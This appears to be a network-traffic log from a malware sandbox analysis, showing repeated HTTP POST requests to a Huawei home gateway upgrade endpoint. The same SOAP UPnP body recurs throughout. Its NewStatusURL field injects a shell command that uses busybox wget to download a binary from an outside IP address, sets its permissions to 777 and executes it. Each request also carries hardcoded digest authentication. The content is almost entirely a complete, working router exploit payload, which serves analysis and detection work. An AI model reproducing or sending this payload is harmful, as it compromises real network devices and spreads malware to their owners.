                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.362209082 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.034095049 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.346103907 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:09.097939968 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:14.473810911 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      25192.168.2.143603041.132.105.2437215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.677144051 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.035835028 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.362209082 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.034080029 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.346123934 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:09.097976923 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
